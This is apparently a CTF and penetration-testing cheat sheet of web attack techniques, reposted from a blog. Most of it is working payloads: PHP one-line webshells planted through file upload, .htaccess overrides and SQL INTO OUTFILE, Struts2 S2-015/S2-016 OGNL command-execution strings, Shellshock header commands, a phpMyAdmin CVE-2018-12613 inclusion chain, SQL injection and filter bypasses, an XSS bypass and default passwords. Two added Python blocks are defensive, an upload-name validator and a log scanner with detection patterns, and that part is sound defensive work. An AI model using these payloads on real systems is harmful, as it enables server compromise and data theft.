ctf notes 19.8.11-19.8.27

File upload vulnerability
When uploading a .php file fails, suspect an extension allow-list and try alternative suffixes (php5, php3).
IIS6 parsing vulnerability: when a file is uploaded into a directory named /*.asp/, every file in it is parsed as ASP, so an image or txt webshell uploaded there can be connected to directly.

SQL injection
Numeric injection: no single quote needed.
String injection: a single quote in front and a comment character after; universal password ' or '1'='1, etc.
Blind injection:
Use existing tools or scripts, with Burp brute-forcing to assist.
Regexp injection:
1 and 1=(select 1 from information_schema.tables where table_schema='xxx' and table_name regexp '^us[a-z]' limit 0,1)
Note: regexp matches against all rows, so unlike the limit n,1 of conventional blind injection, n does not need to be changed.
Similarly, like can be used in the same way as regexp:
select user() like 'ro%'

Weak passwords
admin/admin, admin/admin888, admin/123456, admin/<domain name>, test/test, test/test123

File parsing vulnerabilities
Directory parsing:
/xx.asp/webshell.jpg
/xx.asa/webshell.jpg
File parsing:
webshell.asp;jpg applies to IIS6
Apache parsing vulnerability:
test.php.xxx.yyy, where the suffixes xxx and yyy are both unrecognized extensions
copy xx.jpg /b + yy.txt /a xy.jpg builds an image webshell -> take sp.jpg, write into it <?php fputs(fopen('payload.php','w'),'<?php eval($_POST[hehe])?>');?>, then access sp.jpg/.php; applies when Fast-CGI is enabled on IIS 7.0 / IIS 7.5 / Nginx version <= 8.03
/xx.jpg%00.php applies when Fast-CGI is disabled, Nginx <= 0.8.37
Rare suffixes:
PHP also has phtml, pht, php3, php4, php5, pyc and pyo
.htaccess use:
If a .htaccess file can be uploaded and overrides the original configuration, write into it: <FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch>
Preconditions: Apache's configuration file must contain AllowOverride All
mod_rewrite must be loaded, i.e. the Apache configuration file contains LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so
(needed on Ubuntu) sudo a2enmod rewrite
Usage:
MIME type check bypass: write into .htaccess: AddType application/x-httpd-php
or write <FilesMatch "shell.jpg"> SetHandler application/x-httpd-php </FilesMatch>, so that shell.jpg is parsed as PHP
or write <FilesMatch "hello"> SetHandler application/x-httpd-php </FilesMatch>, so that any file whose name contains hello is interpreted as PHP
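A server-side allow-list check that rejects every filename trick listed under the file upload, file parsing and .htaccess sections above; this is an added example, not code from the original notes, and the ALLOWED set and the random-rename policy are assumptions for a hypothetical image upload.

```python
import re
import secrets

# Extensions this hypothetical application actually needs (assumption for the example).
ALLOWED = {"jpg", "jpeg", "png", "gif"}
# Server-side executable suffixes named in the notes, plus .htaccess; never accepted.
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "pht", "pyc", "pyo",
              "asp", "asa", "htaccess"}
BASE_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload_name(filename):
    """Return (ok, reason) for a client-supplied filename.

    Each check maps to a trick from the notes: %00 truncation, /xx.asp/ directory
    parsing, shell.asp;jpg on IIS6, test.php.xxx.yyy on Apache, .htaccess overrides
    and the rare PHP suffixes.
    """
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False, "null byte or path separator"
    if ";" in filename:
        return False, "semicolon in name"
    parts = filename.lower().split(".")
    if len(parts) != 2:
        return False, "exactly one extension required"
    base, ext = parts
    if not BASE_RE.match(base):
        return False, "invalid base name"
    if ext in EXECUTABLE:
        return False, "executable extension"
    if ext not in ALLOWED:
        return False, "extension not in allow-list"
    return True, "ok"


def storage_name(filename):
    """Validate, then discard the client name entirely: a random name plus the
    allow-listed extension defeats every filename-based parser trick. The file
    should still be stored where the web server does not execute scripts."""
    ok, reason = validate_upload_name(filename)
    if not ok:
        raise ValueError(reason)
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(8)}.{ext}"
```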

SQL write shell
1' union select 1,'<?php eval($_POST[a]);?>' into outfile '/var/www/tmp/a.php'# writes a one-line PHP shell; prerequisite: the site's absolute path is known; the one-line shell part can be converted to hex
To find the absolute path, use into outfile with a fictitious path: the error message reveals the real path
Bypass: when a keyword such as union is filtered, it can be rewritten as un union ion

Struts2 S2-016 vulnerability
Find an action, then construct the following code (taking index.action and the redirect parameter as an example; the code executes a command and can be used to download files locally)
index.action?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'ls','\'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}
new java.lang.String[]{'ls','\'} is the command being executed
The content after index.action?redirect: may need to be URL-encoded
The following code can echo the site's absolute path:
index.action?redirect:${#a=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#b=#a.getSession(),#c=#b.getServletContext(),#d=#c.getRealPath("/"),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#d),#matt.getWriter().flush(),#matt.getWriter().close()}
All of the above code consists of OGNL expressions.

Bash remote command execution vulnerability
Look for /cgi-bin/x.cgi, or find CGI scripts directly with a search engine
Exploit: () { :; }; + command (capture with Burp and put this statement into the Connection or User-Agent header)
Command examples:
() { :; }; echo; /bin/bash -c 'cat /key.txt'
() { :; }; echo; /bin/ls /
echo; ends the function definition
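A log-scanning check for the Bash function-definition header pattern above and the Struts2 OGNL markers from the S2-016 section, run over constructed Apache combined-format log lines; this is an added example, not code from the original notes, and the IPs and timestamps are made up.

```python
import re
from urllib.parse import unquote

# Constructed Apache "combined" log lines (not real traffic): the first three carry the
# Bash header pattern and OGNL markers from the notes, the last one is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Aug/2019:10:01:02 +0000] "GET /cgi-bin/x.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo; /bin/ls /"
203.0.113.6 - - [19/Aug/2019:10:01:03 +0000] "GET /index.action?redirect:${%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')} HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Aug/2019:10:01:04 +0000] "GET /%2524%257B1%252B1%257D.action HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.8 - - [19/Aug/2019:10:01:05 +0000] "GET /index.php?jpg=hei.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

SIGNATURES = {
    # Bash function definition that opens the CGI command-execution payload: () { :; };
    "shellshock": re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;"),
    # OGNL evaluation markers used by the Struts2 payloads in the notes.
    "ognl": re.compile(r"\$\{|redirect:|#context|_memberAccess"),
}


def decode_twice(value):
    """Undo up to two levels of URL encoding, since the notes rely on ..%252f-style double encoding."""
    return unquote(unquote(value))


def scan_log(text):
    """Return (client_ip, signature, field) for every request line or header field that matches."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ("req", "ua", "ref"):
            decoded = decode_twice(m[field])
            for name, pattern in SIGNATURES.items():
                if pattern.search(decoded):
                    hits.append((m["ip"], name, field))
    return hits
```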

SVN source code leak vulnerability
/.svn/entries shows the web directory version number
/.svn/wc.db can be downloaded and opened with database software such as SQLiteStudio (or rename it to .txt and try opening it in Notepad++), then look for the key

0day bypass
<svg><script xlink:href=data:,alert(1)></script></svg> bypass using the svg tag

phpMyAdmin backend file inclusion vulnerability CVE-2018-12613
Prerequisite: logged in to the web interface
Open the SQL tab and run SELECT '<?php phpinfo()?>';
Capture with Burp and record the cookie (phpMyAdmin=xxx)
Use the file inclusion vulnerability:
index.php?target=db_sql.php%253f/../../../../../../../../../../../tmp/sess_ + the cookie recorded earlier
(on macOS the session save directory is /var/tmp/, on Linux it is /var/lib/php/sessions)
Find the path in the phpinfo output, i.e. the site's absolute path
Example: /var/www/html/
Write the shell via SQL into outfile:
SELECT '<?php @eval($_POST[a]);?>' INTO outfile '/var/www/html/a.php'

HTTP header injection (X-Forwarded-For)
Capture, send to Repeater, and write X-Forwarded-For: or 1=1
If an error is returned, there is injection
Then follow up with conventional SQL injection (order by ..., union select ...)

Struts2 S2-004 vulnerability
Usage pattern: /struts/../ directory traversal
Bypass: URL-encode as ..%2f; if nothing is returned, try double URL encoding ..%252f

Struts2 S2-015 vulnerability
Test: /${1+1}.action; if the expression is evaluated, the vulnerability exists
Exp: ${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls').getInputStream()),#q}.action
Bypass: URL encoding

Parameter submission:
Parameters can be submitted to the site as ?parameter or /parameter; the submission can be modified with Burp

File read
Example: index.php?jpg=hei.jpg; rewriting it as index.php?jpg=index.php reads the contents of index.php

Created by PhpStorm
PhpStorm automatically generates a .idea directory, which contains a set of XML files

Source: blog.51cto.com/14003082/2433044